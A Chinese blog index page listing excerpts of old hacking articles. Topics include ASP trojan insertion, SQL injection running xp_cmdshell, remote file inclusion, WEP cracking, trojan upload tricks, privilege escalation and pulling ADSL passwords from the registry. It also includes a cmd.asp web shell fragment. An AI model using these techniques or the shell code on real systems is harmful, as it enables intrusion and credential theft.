
New Skill
文章平均质量分 69
freexploit
这个作者很懒,什么都没留下…
展开
-
%5c类的漏洞 in asp/asp.NET
%5c类的 漏洞在asp不再复述 我们看看 它在asp.net下的问题 Microsoft ASP.NET vulnerability (updated Oct. 7th) Microsoft announced a possible vulnerability in ASP.NET (http://www.microsoft.com/security/incident/aspnet.m原创 2004-10-17 00:35:00 · 1791 阅读 · 1 评论 -
目录锁定说明-转载
原文连接:http://spaces.msn.com/members/kakaru/Blog/cns!1pBW88fYlWroTYAFBw3BbRbg!206.entry目录锁定说明 mkdir "abc" 正常创建mkdir "abc./" 用不正常的方法创建一个正常的目录mkdir "abc./ xxx"用不正常的方法创建目录abc并且同时创建abc下的子目录[ xxx]mkdir "ab原创 2005-05-24 15:31:00 · 2360 阅读 · 0 评论 -
CS服务器下载漏洞
我是真的觉得这个东西可以利用来入侵的 因为官方的补丁吧dll exe com vbs这些文件全部都禁止下载了要是只是防止密码文件cfg泄漏 何必要禁止这些呢 CS主机远程控制方法与被恶意控制的对策作者:火旗枪剑 来源:枪旗工作室(tcno.net) 日期:2005-5-21 半条命cs的服务器,即一般俗称的主机,带有遥控功能。管理员凭密码控制服务器,甚至不需要进入游戏。本文以主要以coun原创 2006-01-25 02:23:00 · 3448 阅读 · 0 评论 -
trackbacks和其相关概念
大多数网志软件都能让读者添加网志评论.但更常见的做法是让读者在其自己的网志添加一个入口回链到原来的帖子.博客们(Bloggers)都乐于跟踪连接发生的时间以便新读者能理解整个会话内容. 所谓 referrer 是一个外部站点,用户单击该站点上一个超链接便可以到达你的网站.许多网志引擎当读者导航到你的网志的某个入口时都能自动保持跟踪.大多数引擎都会在网志入口底部显示一个 referrers 清单,原创 2006-03-14 23:58:00 · 4079 阅读 · 0 评论 -
【转贴】一种在BIOS中嵌入应用程序的方法及实现
一种在BIOS中嵌入应用程序的方法及实现介绍本文针对Award公司开发的计算机系统BIOS提出了一种嵌入应用程序的方法,其基本原理对别的品牌的BIOS也一样适用,仅需稍加修改。文中作者给出并讨论一个完整的例子程序,该程序已经通过实验验证。 一. BIOS简述这里所讲的BIOS是指计算机主板上的BIOS,是整个计算机的关键和灵魂,计算机一启动就是执行BIOS程序,它负责加电自检,初始化计算系统,响应转载 2006-03-16 21:24:00 · 2385 阅读 · 0 评论 -
MS Windows Services Access List Checker / Modifier PoC
/* * Privilege Checker for windows Services * (c) 2006 Andres Tarasco ( atarasco _at_ gmail.com ) * http://www.haxorcitos.com * * Based on Sudhakar Govindavajhala and Andrew Appel paper *原创 2006-02-03 12:07:00 · 2074 阅读 · 0 评论 -
IIS 5.1 allows for remote viewing of source code..
Submitted by zwell on Sun, 2006-04-02 17:52. ExploitsOrigin: http://www.fr33d0m.net/content-2947.html It is possible to remotely view the source code of web script files though a specially craf转载 2006-04-03 12:02:00 · 1892 阅读 · 0 评论 -
破解WEP密钥过程全解(上)
WLAN技术出现之后,“安全”就成为始终伴随在“无线”这个词身边的影子,针对无线网络技术中涉及的安全认证加密协议的攻击与破解就层出不穷。现在,因特网上可能有数以百计,甚至以千计的文章介绍关于怎么攻击与破解WEP,但有多少人能够真正地成功攻破WEP的加密算法呢?下面笔者来给大家介绍一些关于WEP加密手段的知识,以及就是菜鸟只要按照步骤操作也可成功破解WEP密钥的方法。当然最终的目的还是为了让记者做好转载 2006-04-05 23:08:00 · 19305 阅读 · 1 评论 -
破解静态WEP KEY全过程
破解静态WEP KEY全过程广州卓讯盟科技有限公司 黄超毅Email:huangchaoyi@gzpia.com/demonalex@dark2s.org发现首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行‘踩点’(数据搜集)。NetStumbler 下载地址 http://www.netstumbler.com/downloads转载 2006-04-05 21:36:00 · 12219 阅读 · 1 评论 -
破解WEP密钥过程全解 (下)
三、实战破解过程 1、用Kismet进行网络探测 Kismet是一个基于Linux的无线网络扫描程序,这是一个相当方便的工具,通过测量周围的无线信号来找到目标WLAN。虽说Kismet也可以捕获网络上的数据通信,但在还有其他更好的工具使用(如Airodump),在这里我们只使用它来确认无线网卡是否正常工作和用来扫描无线网络,在下面的部分中将会换用不同的工具软件来真正地侦听和捕获网络上的转载 2006-04-05 23:01:00 · 12875 阅读 · 1 评论 -
ASP数据库插马小议 By lake2 ( http://lake2.0x54.org )
By lake2 ( http://lake2.0x54.org ) 随着技术的发展,ASP数据库插马也不是什么新鲜的东东了,相信阁下也玩过这个的吧。呵呵,那你有没有遇到过插入的asp代码被空格拆开的情况呢(即插入的每个字符之间都出现了空格)?现在,就让我们来解决这个问题。经过对多例实际情况的分析,我发现只要出现代码被空格隔开的数据库,相应的字段的Unicode压缩属性总是“否”。相反转载 2006-05-02 11:49:00 · 2725 阅读 · 0 评论 -
RSS阅读中潜在的安全问题 【 综合文 】
前2天读到了? RSS阅读中潜在的安全问题 | 未完成 - Incomplete,讲的是混杂在Rich Text的RSS中的js会在RSS阅读客户端执行从而导致潜在的漏洞问题。正巧我在上个周末的时候也遇到了类似的一个问题:不过更严重的是在RSS聚合的服务器端。我的首页是用require_once(lilina.html) 的方式包含一个lilina.php生成的静态页面组合生成的,源代码如下。转载 2006-05-31 10:42:00 · 3095 阅读 · 0 评论 -
从钓鱼与BHO角度看在线支付安全问题
发到安全文摘不知道能不能通过。一年前的东西,我这人很懒,一直在脑子里YY,现在有空写了下来,但也写得很短。。。。。文摘不能放附件。这里放个测试的附件从钓鱼与BHO角度看在线支付安全问题linkboy最近在线支付的安全问题折腾的挺热闹。先是安全控件的问题,然后网站也出了各类漏洞,今天我从钓鱼和BHO的角度看一下在线支付系统的安全问题。说道钓鱼大家肯定很熟悉,最常说的就是假冒中国工商银行域名,www转载 2007-02-27 23:24:00 · 3997 阅读 · 0 评论 -
通过注册表获取n个密码
作者:Mykey QQ:7967877通过注册表 获取ADSL帐号、密码 AND 瑞星正版序列号、ID号原先的都是由 路由器的原始密码没有改获取 那太简单 而且有很大的重复性 一个可能已经被N人搞过了。现在 ADSL用户 拨号上网 有大部分都在使用 VnetClient 软件 导出注册表 Hkey_local_MACHINE/SOFTWARE/SHilingtong/Gne原创 2004-12-23 21:17:00 · 4275 阅读 · 0 评论 -
URL Protocol- -(coolice)
凡具有/HEKY_CLASSES_ROOT/MyProtocol/"URL Protocol"==reg_sz:""键值的,该MyProtocol均被注册为系统的协议[HKEY_CLASSES_ROOT/MY/shell/open/command]@="MyCMD.exe /"%1/""MyProtol://location调用的时候形如:MyCMD.exe MyProtocol://locati原创 2004-12-01 11:22:00 · 1667 阅读 · 1 评论 -
ADSL宽带拨号密码的另类拿法
文章作者:Netfox拿到别人的ADSL宽带拨号密码有什么用??不用我告诉了吧?看过网上流传的一些《黑客入侵ADSL路由器》的文章后,一直有个疑问,文章中说到:外置式ADSL路由器的拨号用户密码随便找个看*软件就能看到,而实际上密码处是些圆点,根本无从查看,用查看网页源码的方法也过时了,现在的ADSL管理页面源码中也根本看不到PASSWD了(至少我没成功过,如果有谁能看到,请告诉我方法!)难道真的原创 2004-10-16 07:30:00 · 2111 阅读 · 1 评论 -
逃避时间限制
作者:cidea这几天在学习perl。所谓学以至用,立刻写了个在某论坛智能发帖的脚本。一切功能都似乎有了:自动回帖,锁帖后自动开帖 楼高N层后自动开帖。。。。但是有一项不是很好玩的限制是:发帖时间被限制为10秒一帖,对于我们这些人来说10秒虽然短,但是是一个限制,能否逃避这个限制呢?时间限制一般有3种方式:1,是用COOKIE2,是用session3,是在服务器的用户资料保存对于第3种来说,我原创 2004-10-20 17:34:00 · 1403 阅读 · 0 评论 -
利用www.google.com入侵的拓扑图
740)this.width=740" border=undefined>原创 2004-10-25 13:07:00 · 1692 阅读 · 0 评论 -
cmd.asp [自定cmd.exe地址]
本文作者:lcx文章出处:未知文章性质:原创阅读次数:28发布日期:2004-10-24 end if %> if request("cmdx")="cmd.exe地址,可更改可默认" then response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall end i原创 2004-10-28 14:35:00 · 1896 阅读 · 0 评论 -
远程文件包含漏洞的利用
论坛登陆名: CrAcKlOVe提交者邮件地址: CrAcKlOVe@Zj.com提交者QQ号码: 版权:文章属中华安全网http://www.safechina.net和作者共同所有,转载请注明出处!!标题: 远程文件包含漏洞的利用内容:▲远程文件包含漏洞的利用*****************************AuThor:CrAcKlOvE **emA!l:CrAcK原创 2004-10-22 23:59:00 · 1772 阅读 · 0 评论 -
跨站式SQL注入技巧
前一阶段,在尝试攻击一个网站的时候,发现对方的系统已经屏蔽了错误信息,用的也是普通的帐号连接的数据库,系统也是打了全部的补丁这样要攻击注入是比较麻烦的。。因此我自己搞了一种“跨站式SQL注入”。。 思路如下,既然你不显示错误信息,我能不能让你显示到别的地方呢?让SQL把错误写入别的地方。。。 既然是研究阶段,我们最好不要直接注入网站,而是首先用查询分析器来分析这个方法。。 第一个想法:原创 2004-10-24 09:29:00 · 1197 阅读 · 0 评论 -
不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令
我的BLOG里有一篇文章介绍了关于SQL注入的基本原理和一些方法。最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:EXEC master.dbo.xp_cmdshell dir c:/但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库x原创 2004-10-24 10:16:00 · 1713 阅读 · 0 评论 -
使用FlashFXP来提升权限
最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里 来的提升啊。我们得到webshell也原创 2004-10-27 16:27:00 · 3124 阅读 · 0 评论 -
asp.net环境下的cmd命令执行
cmd.asp木马大家一定用过吧。这是一个可以执行cmd命令的asp文件(不过要被杀毒软件追杀^_^)。其原理是用WSCRIPT.SHELL对象调用cmd.exe,然后把返回的信息放到一个临时文件,再利用FSO把临时文件信息读出来显示在浏览器里。 呵呵,在asp.net环境下也是可以写出类似程序的。不过可以不用那些对象。 VB.net里有一个shell函数,可以执行外部程序。呵呵,就是利用原创 2004-10-31 00:33:00 · 1792 阅读 · 0 评论 -
upfile之cookies提交利用(经典 太经典了)
作者:swap类别:漏洞资料库发布日期:2004-10-29 22:26:53总浏览:1提示,一般提交点 upload.asp upload.htm upfile.asp upfile.htm cookies之提交之方法的三种利用 找一个可以提交的点先,http://218.27.1.210/admin/upload.asp, 随便提交一个马,mm.asp,并用WSockExpert监听。 截取原创 2004-10-30 02:10:00 · 3897 阅读 · 0 评论 -
利用“侦听-转发”程序破译网管协议
Submitted by Iceberg on 2004, October 9, 7:13 AM. C/C++ 一、 开发目的及原理 ---- 本公司在产品开发过程中,需要研究多种以太网交换机(又称智能集线器)的内部网管信息结构,为此,必须编写出一个“窃听”程序,把网管程序和交换机的通讯内容记录下来加以分析。本人在Visual C++ 6.0下用MFC Socket类编出程序,原创 2004-11-18 10:55:00 · 1169 阅读 · 0 评论 -
一种察看asp源代码的思路
方法很简单,我们知道,一般在asp中应用文件时一般采用 两种方式,通过stm文件,是可以直接将asp文件的源代码直接输出到客户浏览器中。 要求: 1、服务器端要有shtml脚本映射 2、可以向服务器写入.stm/.shtm/.shtml后缀文件 3、知道想察看文件的文件名及相对位置 举例: 向服务器目录写入test.原创 2004-11-18 13:18:00 · 2045 阅读 · 0 评论 -
FreeXploiT 成立三年感言!
04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo原创 2008-01-11 22:43:00 · 8345 阅读 · 7 评论